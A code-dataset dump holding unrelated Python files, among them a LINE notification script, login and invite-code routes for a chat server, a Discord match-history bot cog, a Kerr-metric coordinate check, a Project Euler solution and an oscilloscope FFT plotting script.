id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
6499174
|
<reponame>WachiRatip/ex<filename>linenotify.py
import requests,json
import urllib.parse
LINE_ACCESS_TOKEN="<KEY>"
url = "https://notify-api.line.me/api/notify"
message ="VM has done their jobs" # ข้อความที
msg = urllib.parse.urlencode({"message":message})
LINE_HEADERS = {'Content-Type':'application/x-www-form-urlencoded',"Authorization":"Bearer "+LINE_ACCESS_TOKEN}
session = requests.Session()
a=session.post(url, headers=LINE_HEADERS, data=msg)
print(a.text)
|
StarcoderdataPython
|
131884
|
<reponame>tcmal/ah-project
# Routes related to Users
# Specifically:
# Registering
# Authenticating
# Generating Invite Codes
# Getting a list of users
import base64
import datetime
import json
import random
from math import floor
from rsa import RSAKeypair
from rsa.classes import PUB_KEY_START, PUB_KEY_END
from routes.common import send_bad_request, send_server_error, is_authorised, send_json
from utils import random_string, has_keys
# POST /register
# Inputs: invite_code, name, bio, public_key
# Attempts to register a new user
# Outputs: Details of new user OR 'Not valid'
def register(req, res):
# Get inputs from request
## Check they all exist first
if not req.body or not has_keys(req.body, ("invite_code", "name", "bio", "public_key")):
## Error otherwise
return send_bad_request(res, "Malformed Request")
invite_code = req.body['invite_code']
name = req.body['name']
bio = req.body['bio']
public_key = req.body['public_key']
# Verify name, bio and public key
valid = len(name) <= 50 and len(name) > 0 and len(bio) <= 250 # bio can be empty
## Check if the public key is valid
try:
deserialised = RSAKeypair.deserialise(public_key)
assert deserialised.is_public
except Exception as _:
valid = False
## Error otherwise
if not valid:
return send_bad_request(res, "Invalid name, bio or public key")
# Verify invite code is valid and exists
code_valid = False
if len(invite_code) == 10 and invite_code.isalnum(): # Is alpha numeric and 10 chars long
## Check database
with req.db as conn:
# Check one that's not used by a user exists
sql = "SELECT COUNT(*) AS valid FROM InviteCode WHERE code = %s AND code NOT IN (SELECT invite_code FROM User);"
conn.execute(sql, (invite_code,))
result = conn.fetchone()
code_valid = result[0] > 0
# Error otherwise
if not code_valid:
return send_bad_request(res, "Invalid Invite Code")
# Add the user to the database
with req.db as conn:
## Convert public key to what ends up in the database
processed_pk = deserialised.to_binary_hex()
sql = "INSERT INTO User (name, bio, public_key, is_admin, invite_code) VALUES (%s, %s, X%s, 0, %s)"
success = True
try:
conn.execute(sql, (name, bio, processed_pk, invite_code))
success = conn.rowcount == 1
except Exception as _: # Probably duplicate name
success = False
if success:
# Return details of new user
return send_json(res, {
'success': True,
'name': name,
'bio': bio,
'public_key': public_key,
})
else:
# OR Error
return send_bad_request(res, "Username already taken")
# POST /auth/getChallenge
# Inputs: username
# Get the authentication challenge for that user
def getChallenge(req, res):
# Get user to try and sign in as
if not req.body or not "username" in req.body.keys():
## Error otherwise
return send_bad_request(res, "Malformed Request")
username = req.body['username']
# Generate random string
challenge_string = random_string(10)
# Save to database along with time generated (if user exists)
with req.db as conn:
sql = "UPDATE User SET last_challenge_issued = %s, challenge_issued_at = NOW() WHERE name = %s"
conn.execute(sql, (challenge_string, username))
updated = conn.rowcount == 1
if updated:
# Return challenge
return send_json(res, {
'success': True,
'challenge_string': challenge_string,
})
else:
# Error if user doesn't exist
return send_bad_request(res, "User Not Found")
# POST /auth/submitChallenge
# Inputs: username, challenge_answer
# Try to authenticate as user
def submitChallenge(req, res):
# Get inputs from request
## Check they all exist first
if not req.body or not has_keys(req.body, ("username", "challenge_answer")):
## Error otherwise
return send_bad_request(res, "Malformed Request")
username = req.body['username']
challenge_answer = req.body['challenge_answer']
# Get user from database (OR error)
with req.db as conn:
sql = "SELECT HEX(public_key), last_challenge_issued, challenge_issued_at FROM User WHERE name = %s"
conn.execute(sql, (username,))
result = conn.fetchone()
if not result:
return send_bad_request(res, "User Not Found or Invalid challenge")
pk_hexstring = result[0]
last_challenge_issued = result[1]
challenge_issued_at = result[2]
# Verify challenge issued within 10 minutes (OR error)
mins_since = (datetime.datetime.now() - challenge_issued_at).seconds / 60
if mins_since > 10:
return send_bad_request(res, "Challenge timed out")
# Decrypt signed challenge with public key
key = RSAKeypair.from_binary_hex(pk_hexstring)
# Verify equal to last challenge issued (OR error)
message = bytearray(key.decrypt_signed(challenge_answer)).decode('ascii')
if message == False or message != last_challenge_issued:
return send_bad_request(res, "User Not Found or Invalid challenge")
# Generate random session token
cookie_val = res.server.session_store.new()
# Store it as session token for this user
session = res.server.session_store.get(cookie_val)
session.username = username
# Return session token
req.cookies['session'] = cookie_val
req.cookies['session']['max-age'] = 2 * 60 * 60
req.cookies['session']['path'] = '/'
res.send_response(200)
res.send_header('Content-Type', 'application/json')
res.send_header('Set-Cookie', str(req.cookies).replace('Set-Cookie: ', ''))
res.end_headers()
res.wfile.write(json.dumps({
'success': True,
'session_cookie': cookie_val,
'username': username
}).encode('ascii'))
# GET /admin/genInviteCode
# Generate a new invitecode, as long as you're an admin
def genInviteCode(req, res):
# Verify authorisation
if not is_authorised(req):
# Error otherwise
return send_bad_request(res, 'No Session')
# Verify user is admin
with req.db as conn:
sql = "SELECT COUNT(*) FROM user WHERE name = %s AND is_admin = 1"
conn.execute(sql, (req.session.username,))
count = conn.fetchone()[0]
is_admin = count == 1
if not is_admin:
# Error otherwise
return send_bad_request(res, "Not an admin")
# Generate random string
invite_code = random_string(10)
# Save to database as invite code
with req.db as conn:
sql = "INSERT INTO invitecode (code, created_by) VALUES (%s, %s)"
conn.execute(sql, (invite_code, req.session.username))
success = conn.rowcount == 1
if success:
# Return invite code
return send_json(res, {
'success': True,
'invite_code': invite_code
})
else:
# This shouldn't happen
send_server_error(res)
# GET /directory
# Return all users on the server (as long as you're authenticated)
def directory(req, res):
# Verify the user's authorisation (OR error)
if not is_authorised(req):
return send_bad_request(res, "No Session")
# Get the users from the database
users = []
with req.db as conn:
sql = "SELECT name, bio, is_admin, HEX(public_key) FROM User WHERE name != 'console'"
conn.execute(sql)
for row in conn:
users.append({
'name': row[0],
'bio': row[1],
'is_admin': row[2] == 1,
'public_key': RSAKeypair.binary_hex_to_serialised(row[3])
})
# Return them
return send_json(res, {
'success': True,
'users': users
})
|
StarcoderdataPython
|
4898242
|
import discord
from discord.ext import commands
from pyrez.exceptions import PlayerNotFound, PrivatePlayer, NotFound, MatchException
# Class handles commands related a player's previous matches
class MatchHistoryCommands(commands.Cog, name="Match History Commands"):
"""Match History Commands"""
def __init__(self, bot):
self.bot = bot
@classmethod
# Used to change text prefix to change it's color
async def color_win_rates(cls, text, win_rate):
if float(win_rate) > 60.0:
return "+" + text
elif float(win_rate) < 50.0 and float(win_rate) != 0.0:
return "-" + text
else:
return "*" + text
@classmethod
# Converts the match name so that its small enough to fit on one line
async def convert_match_type(cls, match_name):
if "Practice" in match_name:
return "Bot Match"
elif "TDM" in match_name:
return "TDM"
elif "Onslaught" in match_name:
return "Onslaught"
elif "Ranked" in match_name:
return "Ranked"
elif "(KOTH)" in match_name:
return "KOTH"
elif "(Siege)" in match_name: # Test Maps (WIP)
return "Test Maps"
else:
return "Siege"
@commands.command(name='history', pass_context=True, ignore_extra=False,
aliases=["History", "historia", "Historia"])
@commands.cooldown(3, 40, commands.BucketType.user)
async def history(self, ctx, player_name, amount=None, champ_name=None):
lang = await self.bot.language.check_language(ctx=ctx)
# Maybe convert the player name
if str(player_name) == "me":
player_name = await self.check_player_name(str(ctx.author.id))
elif player_name[0] == "<" and player_name[1] == "@": # 99% that someone has been mentioned
player_name = player_name.replace("<", "").replace(">", "").replace("@", "").replace("!", "")
if len(player_name) == 18:
player_name = await self.check_player_name(player_name)
if player_name == "None":
await ctx.send("You have not stored your IGN yet. To do so please use the store command like so: "
"`>>store Paladins_IGN`")
return None
await helper.store_commands(ctx.author.id, "history")
async with ctx.channel.typing():
if amount:
try:
amount = int(amount)
except ValueError:
champ_name = amount
amount = 50
else:
amount = 10
if amount > 50 or amount < 10:
await ctx.send("Please enter an amount between 10-50.")
await ctx.send("```fix\nDefaulting to the default value of 10 matches.```")
amount = 10
player_id = self.get_player_id(player_name)
if player_id == -1:
await ctx.send(self.lang_dict["general_error2"][lang].format(player_name))
return None
elif player_id == -2:
await ctx.send("```Invalid platform name. Valid platform names are:\n1. Xbox\n2. PS4\n3. Switch```")
return None
elif player_id == -3:
await ctx.send("Name overlap detected. Please look up your Paladins ID using the `>>console` command.")
return None
if champ_name: # Check in case they don't provide champ name
champ_name = await self.convert_champion_name(str(champ_name))
try:
paladins_data = self.bot.paladinsAPI.getMatchHistory(player_id)
# Endpoint down
if paladins_data is None:
await ctx.send("```fix\nPaladins Endpoint down (no data returned). Please try again later and "
"hopefully by then Evil Mojo will have it working again.```")
return None
except (NotFound, MatchException):
await ctx.send("Player does not have recent match data or their account is private. Make sure the first"
" parameter is a player name and not the Match Id.")
return None
count = 0
total_matches = 0
match_data = ""
match_data2 = ""
# Damage, Flank, Tank, Support => (win, lose)
total_wins = [0, 0, 0, 0, 0, 0, 0, 0]
# Damage, Flank, Tank, Support => (kda, total_matches per class)
total_kda = [0, 0, 0, 0, 0, 0, 0, 0]
global_kda = 0.0
for match in paladins_data:
# Check to see if this player does have match history
if match.playerName is None:
await ctx.send("Player does not have recent match data or their account is private.")
return None
else:
player_name = match.playerName
# empty string means to get everything or only get matches with a certain champ
if not champ_name or champ_name == match.godName:
ss = str('+{:10}{:4}{:3}:00 {:9} {:9} {:5} ({}/{}/{})\n')
kills = match.kills
deaths = match.deaths
assists = match.assists
kda = await self.calc_kda(kills, deaths, assists)
match_name = await self.convert_match_type(match.mapName)
ss = ss.format(match.godName, match.winStatus, match.matchMinutes, match_name,
match.matchId, kda, kills, deaths, assists)
# we don't want to count event or bot matches when calculating stats
if match_name != "Bot Match" and match_name != "End Times" and match_name != "Test Maps":
global_kda += float(kda)
total_matches += 1
class_index = self.bot.champs.get_champ_class(match.godName)
if class_index != -1:
total_kda[class_index * 2] += float(kda)
total_kda[class_index * 2 + 1] += 1
if match.winStatus == "Loss":
total_wins[class_index * 2 + 1] += 1 # Losses
else:
total_wins[class_index * 2] += 1 # Wins
else:
print("Unclassified champion: " + str(match.godName))
# Used for coloring
if match.winStatus == "Loss":
ss = ss.replace("+", "-")
if count >= 30:
match_data2 += ss
else:
match_data += ss
# Making sure we display the correct number of matches
count += 1
if count == amount:
break
if not match_data and champ_name:
await ctx.send("Could not find any matches with the champion: `" + champ_name + "` in the last `"
+ str(amount) + "` matches.")
return None
# Base string to hold kda and win rate for all classes
ss = "Class KDA: Win Rate:\n\n" \
"Total: {:5} {:6}% ({}-{})\n" \
"Damages: {:5} {:6}% ({}-{})\n" \
"Flanks: {:5} {:6}% ({}-{})\n" \
"Tanks: {:5} {:6}% ({}-{})\n" \
"Healers: {:5} {:6}% ({}-{})\n\n"
# Calculating win rates
d_t = total_wins[0] + total_wins[1] # Damage total matches
f_t = total_wins[2] + total_wins[3] # Flank total matches
t_t = total_wins[4] + total_wins[5] # Tank total matches
s_t = total_wins[6] + total_wins[7] # Healer total matches
d_wr = await self.calc_win_rate(total_wins[0], d_t)
f_wr = await self.calc_win_rate(total_wins[2], f_t)
t_wr = await self.calc_win_rate(total_wins[4], t_t)
s_wr = await self.calc_win_rate(total_wins[6], s_t)
# Total wins/loses
if total_matches == 0: # prevent division by 0
total_matches = 1
global_kda = round(global_kda / total_matches, 2)
tot_wins = total_wins[0] + total_wins[2] + total_wins[4] + total_wins[6]
tot_loses = total_wins[1] + total_wins[3] + total_wins[5] + total_wins[7]
total_wr = await self.calc_win_rate(tot_wins, d_t + f_t + t_t + s_t)
# Coloring based off of class/total win rates
ss = ss.replace("Total", await self.color_win_rates("Total", total_wr)) \
.replace("Damages", await self.color_win_rates("Damages", d_wr)) \
.replace("Flanks", await self.color_win_rates("Flanks", f_wr)) \
.replace("Tanks", await self.color_win_rates("Tanks", t_wr)) \
.replace("Healers", await self.color_win_rates("Healers", s_wr))
# KDA calc
d_kda, f_kda, t_kda, s_kda, = 0.0, 0.0, 0.0, 0.0
if total_kda[0] != 0:
d_kda = round(total_kda[0] / total_kda[1], 2)
if total_kda[2] != 0:
f_kda = round(total_kda[2] / total_kda[3], 2)
if total_kda[4] != 0:
t_kda = round(total_kda[4] / total_kda[5], 2)
if total_kda[6] != 0:
s_kda = round(total_kda[6] / total_kda[7], 2)
# Filling the the string with all the data
ss = ss.format(global_kda, total_wr, tot_wins, tot_loses, d_kda, d_wr, total_wins[0], total_wins[1], f_kda,
f_wr, total_wins[2], total_wins[3], t_kda, t_wr, total_wins[4], total_wins[5], s_kda, s_wr,
total_wins[6], total_wins[7])
title = str('{}\'s last {} matches:\n\n').format(str(player_name), count)
title += str('{:11}{:4} {:4} {:9} {:9} {:5} {}\n').format("Champion", "Win?", "Time", "Mode", "Match ID",
"KDA", "Detailed")
title += match_data
await ctx.send("```diff\n" + title + "```")
match_data2 += "\n\n" + ss
await ctx.send("```diff\n" + match_data2 + "```")
# Returns simple match history details
@commands.command(name='last', pass_context=True, ignore_extra=False, aliases=["Last", "ostatni", "Ostatni"])
@commands.cooldown(2, 30, commands.BucketType.user)
async def last(self, ctx, player_name, match_id=-1):
lang = await self.bot.language.check_language(ctx=ctx)
# Maybe convert the player name
if str(player_name) == "me":
player_name = await self.check_player_name(str(ctx.author.id))
elif player_name[0] == "<" and player_name[1] == "@": # 99% that someone has been mentioned
player_name = player_name.replace("<", "").replace(">", "").replace("@", "").replace("!", "")
if len(player_name) == 18:
player_name = await self.check_player_name(player_name)
if player_name == "None":
await ctx.send("You have not stored your IGN yet. To do so please use the store command like so: "
"`>>store Paladins_IGN`")
return None
await helper.store_commands(ctx.author.id, "last")
player_id = self.get_player_id(player_name)
if player_id == -1:
match_data = self.lang_dict["general_error2"][lang].format(player_name)
embed = discord.Embed(
title=match_data,
colour=discord.colour.Color.dark_teal()
)
await ctx.send(embed=embed)
return None
elif player_id == -2:
embed = discord.Embed(
title="```Invalid platform name. Valid platform names are:\n1. Xbox\n2. PS4\n3. Switch```",
colour=discord.colour.Color.red()
)
await ctx.send(embed=embed)
return None
elif player_id == -3:
embed = discord.Embed(
title="Name overlap detected. Please look up your Paladins ID using the `>>console` command.",
colour=discord.colour.Color.red()
)
await ctx.send(embed=embed)
return None
try:
paladins_data = self.bot.paladinsAPI.getMatchHistory(player_id)
# Endpoint down
if paladins_data is None:
await ctx.send("```fix\nPaladins Endpoint down (no data returned). Please try again later and "
"hopefully by then Evil Mojo will have it working again.```")
return None
except (NotFound, MatchException):
await ctx.send("Player does not have recent match data or their account is private. Make sure the first"
" parameter is a player name and not the Match Id.")
return None
for match in paladins_data:
# Check to see if this player does have match history
if match.playerName is None:
break
if match_id == -1 or match_id == match.matchId:
match_data = str('{}\'s {} match:\n\n').format(str(match.playerName),
str(match.mapName).replace("LIVE", ""))
ss = str('`Match Status: {} ({} mins)\nChampion: {}\nKDA: {} ({}-{}-{})\nDamage: {:,}\nDamage Taken: '
'{:,}\nHealing: {:,}\nSelf Healing: {:,}\nObjective Time: {}\nShielding: {:,}`\n')
kills = match.kills
deaths = match.deaths
assists = match.assists
kda = await self.calc_kda(kills, deaths, assists)
match_data += ss.format(match.winStatus, match.matchMinutes, match.godName, kda, kills, deaths, assists,
match.damage, match.damageTaken, match.healing, match.healingPlayerSelf,
match.objectiveAssists, match.damageMitigated)
embed = discord.Embed(
description=match_data,
colour=discord.colour.Color.dark_teal(),
)
embed.set_thumbnail(url=await helper.get_champ_image(match.godName))
map_name = match.mapName.replace("LIVE ", "").replace("Ranked ", "").replace(" (TDM)", "") \
.replace(" (Onslaught) ", "").replace(" (Siege)", "").replace("Practice ", "").lower() \
.replace(" ", "_").replace("'", "")
map_url = "https://raw.githubusercontent.com/EthanHicks1/PaladinsAssistantBot/master/icons/maps/{}.png" \
.format(map_name)
embed.set_image(url=map_url)
await ctx.send(embed=embed)
return None
# If the match id could not be found
embed = discord.Embed(
description="Could not find a match with the match id: " + str(match_id),
colour=discord.colour.Color.dark_teal()
)
# If player has not played recently
if match_id == -1:
embed.description = "Player does not have recent match data or their account is private."
await ctx.send(embed=embed)
# Add this class to the cog list
def setup(bot):
bot.add_cog(MatchHistoryCommands(bot))
|
StarcoderdataPython
|
3481809
|
<reponame>divyamamgai/integrations-extras
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from .__about__ import __version__
from .traefik import TraefikCheck
__all__ = ['__version__', 'TraefikCheck']
|
StarcoderdataPython
|
5074467
|
from __future__ import annotations
import asyncio
import socket
from typing import Any, Mapping, Optional
import aiohttp
import async_timeout
from aioherepy.aiohere_api import AioHEREApi
class RoutingApi(AioHEREApi):
"""An asynchronous Python client into the HERE Routing API."""
def __init__(
self,
api_key: str,
request_timeout: int = 10,
session: aiohttp.ClientSession | None = None) -> None:
"""Returns a RoutingApi instance.
Args:
api_key (str):
API key taken from HERE Developer Portal.
request_timeout (int):
Timeout limit for requests.
session (Optional[aiohttp.ClientSession]):
aiohttp client session.
"""
super(RoutingApi, self).__init__(
api_key=api_key,
api_url="https://router.hereapi.com/v8/routes",
request_timeout=request_timeout,
session=session
)
|
StarcoderdataPython
|
9901
|
# ======================================================================
# copyright 2020. Triad National Security, LLC. All rights
# reserved. This program was produced under U.S. Government contract
# 89233218CNA000001 for Los Alamos National Laboratory (LANL), which
# is operated by Triad National Security, LLC for the U.S. Department
# of Energy/National Nuclear Security Administration. All rights in
# the program are reserved by Triad National Security, LLC, and the
# U.S. Department of Energy/National Nuclear Security
# Administration. The Government is granted for itself and others
# acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
# license in this material to reproduce, prepare derivative works,
# distribute copies to the public, perform publicly and display
# publicly, and to permit others to do so.
# ======================================================================
# Authors: <NAME> (<EMAIL>)
# Purpose:
# Provides a check of whether a coordinate transformation of the metric
# from code coordinates to Kerr-Schild coordinates produces correct
# metric, consistent with the closed form (as in e.g. Eq.(3)
# McKinney & Gammie 2004, https://arxiv.org/abs/astro-ph/0404512)
#
# Functions:
# - print_matrix
# - check_transformation_matrices
#
from math import *
import numpy as np
def print_matrix(matrix,fmt="%19.11e",tostdout=True) -> str:
"""Pretty-prints a matrix to a string (optinally, to stdout)
Parameters
----------
matrix : numpy.array([N,M])
matrix to print
fmt : str
C-style format of each element (default: "%19.11e")
tostdout : bool
output to stdout (default: true)
Returns
-------
str
formatted output string
"""
N = matrix.shape[0]
M = matrix.shape[1]
s = "["
for i in range(N):
s+= "["
for j in range(M):
s+= (fmt % matrix[i,j])
if j < M - 1: s += ", "
s+= "]"
if i < N - 1: s += ",\n "
s+="]"
if tostdout: print(s)
return s
def check_transformation_matrices(geom, a, ir, jth,
verbose=True, tol=1e-12) -> bool:
"""Transforms the metric to spherical KS and compares with analytic formula
Test 1: covariant metric, gcov, at A = {ir, jth}
1.1 sample gcov and Lambda_h2bl_cov at A
1.2 transform gcov to gks using transofmration matrices
1.3 compare to expected values at {r,th} at A
Parameters
----------
geom : dictionary
nubhlight geom object
a : Float
dimensionless Kerr spin parameter
ir : Integer
index of sample point in radial direction
jth : Integer
index of sample point in angular theta-direction
verbose : bool
output steps to stdout
tol : Float
tolerance to relative error (wrt det g)
Returns
-------
bool
True if all checks passed
Examples
--------
import hdf5_to_dict as io
hdr = io.load_hdr("dump_00000010.h5")
geom = io.load_geom(hdr,recalc=True)
check_transformation_matrices(geom, -1, 64)
"""
# sample gcov and h2bl at point A
gcov_A = geom['gcov'][ir,jth]
h2bl_A = geom['Lambda_h2bl_cov'][ir,jth]
# sample r and theta, compute BL metric-related quantities
r = geom['r'][ir,jth,0]; r2 = r*r
a2 = a*a
th= geom['th'][ir,jth,0]
sth2= sin(th)**2
Delta= r2 - 2*r + a2
Sigma= r2 + a2*cos(th)**2
A = (r2 + a2)**2 - a2*Delta*sin(th)**2
if verbose:
print ("r = %19.11e" % r)
print ("theta = %19.11e" % th)
print ("a = %19.11e" % a)
print ("Delta = %19.11e" % Delta)
print ("Sigma = %19.11e" % Sigma)
print ("A = %19.11e" % A)
# output metric
print ("gcov_A = ")
print_matrix (gcov_A)
print ("")
# output transformation matrix
print ("h2bl_A = ")
print_matrix (h2bl_A)
print ("")
# compute BL metric at A
gks_A = np.zeros([4,4])
for i in range(4):
for j in range(4):
for k in range(4):
for l in range(4):
gks_A[i,j] = gks_A[i,j] + h2bl_A[k,i]*h2bl_A[l,j]*gcov_A[k,l]
if verbose:
print ("gks_A = ")
print_matrix (gks_A)
print("")
# expected values at {r, th}
g_tt = -1. + 2.*r/Sigma
g_rr = 1. + 2.*r/Sigma
g_ff = sth2*(Sigma + a2*g_rr*sth2)
g_thth = Sigma
g_tr = 2*r/Sigma
g_tf = -2*a*r*sth2/Sigma
g_rf = -a*g_rr*sth2
det_g = -Sigma**2*sth2
if verbose:
print ("Expected:")
print (" g_tt = %19.11e" % g_tt )
print (" g_rr = %19.11e" % g_rr )
print (" g_thth = %19.11e" % g_thth)
print (" g_ff = %19.11e" % g_ff )
print (" g_tr = %19.11e" % g_tr )
print (" g_rf = %19.11e" % g_rf )
print (" g_tf = %19.11e" % g_tf )
print ("")
# check gks_A
gks_expected = np.array(
[[ g_tt, g_tr, 0.0, g_tf],
[ g_tr, g_rr, 0.0, g_rf],
[ 0.0, 0.0, g_thth, 0.0],
[ g_tf, g_rf, 0.0, g_ff]]
)
passed = True
for i in range(4):
for j in range(4):
if abs(gks_A[i,j] - gks_expected[i,j])/abs(det_g) > tol:
passed = False
if verbose:
print (f"WARNING: Significant mismatch in gks_A[{i},{j}]:")
print (" -- expected: %19.11e" % gks_expected[i,j])
print (" -- actual: %19.11e" % gks_A[i,j])
return passed
|
StarcoderdataPython
|
1720966
|
<reponame>saurabhpetkar/club_portal
from django import template
import re
import random
register = template.Library()
@register.filter
def clubslug(value):
return value.replace(' ', '-')
@register.filter
def removeImg(value):
print(value)
p = re.compile(r'<img.*?/>')
p = p.sub('', value)
return p
@register.filter
def randomNumber(limit):
return random.randint(1, limit)
|
StarcoderdataPython
|
3393288
|
<gh_stars>0
import array
import sys
from euler_python.utils import eulerlib
def problem211():
LIMIT = 64000000
# Can be any number >= 1, but it's most beneficial to use a product of unique small primes excluding 2
RESIDUE_TEST = 3 * 5 * 7 * 11 * 13
isresidue = [False] * RESIDUE_TEST
for i in range(RESIDUE_TEST):
isresidue[i * i % RESIDUE_TEST] = True
def is_perfect_square(x):
# Optional optimization: Check if x is a quadratic residue modulo some number.
# The modulus was chosen to be a product of k primes; in this case, k = 5.
# If x is a square, then it must be a quadratic residue modulo each prime.
# For each prime p, there is an approximately half chance that an arbitrary number
# is a residue mod p. Thus with 5 primes, only about 1/32 of candidates remain.
# Note that the prime 2 tells us nothing about whether x is a square, so we exclude it.
return isresidue[x % RESIDUE_TEST] and eulerlib.is_square(x)
# Requires at least 640 MB of memory
sigma2 = list_sigma2(LIMIT - 1)
ans = sum(i for i in range(1, LIMIT) if is_perfect_square(sigma2[i]))
return ans
def list_sigma2(n):
# If i has a prime factor p <= sqrt, then quasiprimefactor[i] = p.
# Otherwise i > sqrt must be prime, and quasiprimefactor[i] = 0 because i may overflow an int16.
sqrt = eulerlib.sqrt(n)
quasiprimefactor = array.array("H", (0 for _ in range(n + 1)))
# Richer version of the sieve of Eratosthenes
for i in range(2, sqrt + 1):
if quasiprimefactor[i] == 0:
quasiprimefactor[i] = i
for j in range(i * i, n + 1, i):
if quasiprimefactor[j] == 0:
quasiprimefactor[j] = i
if sys.version_info.major < 3:
sigma2 = [0] * (n + 1)
else:
sigma2 = array.array("Q", (0 for _ in range(n + 1)))
sigma2[1] = 1
for i in range(2, len(sigma2)):
p = quasiprimefactor[i]
if p == 0:
p = i
sum = 1
j = i
p2 = p * p
k = p2
while j % p == 0:
sum += k
j //= p
k *= p2
sigma2[i] = sum * sigma2[j]
return sigma2
if __name__ == "__main__":
print(problem211())
|
StarcoderdataPython
|
6559340
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# __author__ = 'Liantian'
# __email__ = "<EMAIL>"
#
# MIT License
#
# Copyright (c) 2018 liantian
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from main import app
from models import Post, Category, Archive
# from models import Comment
@app.route('/task/category_count', methods=['GET'], endpoint="task.category_count")
def category_count():
queue = []
queue2 = []
categories = Category.query().fetch()
for c in categories:
cq = dict({})
cq["object"] = c
if c.parent is None:
cq["c_future"] = Category.query(Category.parent == c.key).count_async()
cq["p_future"] = Post.query(Post.category == c.key, Post.status == Post.STATUS_PUBLISHED).count_async()
queue.append(cq)
for q in queue:
c = q["object"]
c.post_count = q["p_future"].get_result()
if q.get("c_future", False):
c.child_count = q["c_future"].get_result()
else:
c.child_count = 0
queue2.append(c.put_async())
for q in queue2:
q.get_result()
return "Done"
@app.route('/task/archive_count', methods=['GET'], endpoint="task.archive_count")
def archive_count():
queue = []
queue2 = []
archives = Archive.query().fetch()
for archive in archives:
cq = dict({})
cq["object"] = archive
cq["p_future"] = Post.query(Post.archive == archive.key, Post.status == Post.STATUS_PUBLISHED).count_async()
queue.append(cq)
for q in queue:
c = q["object"]
c.post_count = q["p_future"].get_result()
queue2.append(c.put_async())
for q in queue2:
q.get_result()
return "Done"
|
StarcoderdataPython
|
3274612
|
<gh_stars>0
"""
To read and plot scope waveforms from CSV files
Author: <NAME>
Version 0
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import pandas as pd
from tkinter.filedialog import askopenfilenames
from tkinter.filedialog import askdirectory
from tkinter import *
def file_dialog():
Tk().withdraw()
file = askopenfilenames()
return file
def dir_dialog():
Tk().withdraw()
pwd = askdirectory()
return pwd
def powermW(x):
P = np.float64(10**(x/10))
return P
files = file_dialog()
d1 = pd.read_csv(files[0], dtype='a')
#d2 = pd.read_csv(files[1], dtype='a')
'''d3 = pd.read_csv(files[2], dtype='a')
d4 = pd.read_csv(files[3], dtype='a')
d5 = pd.read_csv(files[4], dtype='a')
d6 = pd.read_csv(files[5], dtype='a')'''
d1['X'] = (np.float64(d1['X']))*(np.float64(d1['Increment'][0]))
#d2['X'] = (np.float64(d2['X']))*(np.float64(d2['Increment'][0]))
'''d3['X'] = (np.float64(d3['X']))*(np.float64(d3['Increment'][0]))
d4['X'] = (np.float64(d4['X']))*(np.float64(d4['Increment'][0]))
d5['X'] = (np.float64(d5['X']))*(np.float64(d5['Increment'][0]))
d6['X'] = (np.float64(d6['X']))*(np.float64(d6['Increment'][0]))'''
d1['CH1'] = (np.float64(d1['CH1']))
#d2['CH1'] = (np.float64(d2['CH1']))
'''d3['CH1'] = (np.float64(d3['CH1']))
d4['CH1'] = (np.float64(d4['CH1']))-9.8
d5['CH1'] = (np.float64(d5['CH1']))
d6['CH1'] = (np.float64(d6['CH1']))'''
'''PmW1 = powermW(d1['CH1'])/1E-6
PmW2 = powermW(d2['CH1'])/1E-6
PmW3 = powermW(d3['CH1'])/1E-6
PmW4 = powermW(d4['CH1'])/1E-6
PmW5 = powermW(d5['CH1'])/1E-6
PmW6 = powermW(d6['CH1'])/1E-6'''
'''d1 = pd.DataFrame({
'X': d1['X'],
'CH1': d1['CH1'],
'PmW': PmW1
})
d2 = pd.DataFrame({
'X': d2['X'],
'CH1': d2['CH1'],
'PmW': PmW2
})
d3 = pd.DataFrame({
'X': d3['X'],
'CH1': d3['CH1'],
'PmW': PmW3
})
d4 = pd.DataFrame({
'X': d4['X'],
'CH1': d4['CH1'],
'PmW': PmW4
})
d5 = pd.DataFrame({
'X': d5['X'],
'CH1': d5['CH1'],
'PmW': PmW5
})
d6 = pd.DataFrame({
'X': d6['X'],
'CH1': d6['CH1'],
'PmW': PmW6
})'''
'''diff1 = pd.DataFrame({
'X': d1['X'],
'diff': d1['PmW']-d5['PmW']
})
diff2 = pd.DataFrame({
'X': d2['X'],
'diff': d3['PmW']-d6['PmW']
})
diff3 = pd.DataFrame({
'X': d2['X'],
'diff': d2['PmW']-d5['PmW']
})
diff4 = pd.DataFrame({
'X': d2['X'],
'diff': d4['PmW']-d6['PmW']
})
diff5 = pd.DataFrame({
'X': d2['X'],
'diff': d2['PmW']-d1['PmW']
})
diff6 = pd.DataFrame({
'X': d2['X'],
'diff': d4['PmW']-d3['PmW']
})
totalp1 = sum(diff1['diff'][0:301])
totalp2 = sum(diff2['diff'][0:301])
totalp3 = sum(diff3['diff'][0:301])
totalp4 = sum(diff4['diff'][0:301])
totalp5 = sum(diff5['diff'][0:301])
totalp6 = sum(diff6['diff'][0:301])
print('Total Power (x-axis)=%.5f' % totalp1)
print('Total Power (y-axis)=%.5f' % totalp2)
'''
plt.style.use('ggplot')
gs = gridspec.GridSpec(2, 2)
fig = plt.figure(figsize=(16, 9))
ax1 = fig.add_subplot(gs[:,:])
ax1.set_title('Cavity Lock FFT')
ax1.set_ylabel(r'Amplitude (dBm)')
ax1.set_xlabel('Frequency (kHz)')
